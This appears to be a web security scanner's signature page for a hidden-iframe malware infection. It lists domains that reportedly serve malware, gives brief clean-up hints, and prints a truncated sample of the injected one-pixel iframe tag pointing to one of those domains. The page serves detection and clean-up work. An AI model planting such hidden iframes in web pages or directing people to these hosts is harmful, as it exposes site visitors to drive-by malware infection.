SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd202

malware-entry-mwiframehd202

Description:

A hidden (and possibly malicious) iframe was identified. It is sometimes encoded with javascript to hide the fact that an iframe call is present. Loads malware from multiple sources:


fenkaololo.com
oooabterast0.co.cc
http://curem.net/t.php?id=455564
koska.sytes.net/phl/logs/index.php
(and many other domains).

This is used to load malware from external web sites while not being visible to the user.

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding.

 

Malware dump (sample of malware):

<iframe width=''1'' height=1 src=''http://fenkaololo.com/mmmsss/xpxlkzbuaodwitdwy.php"..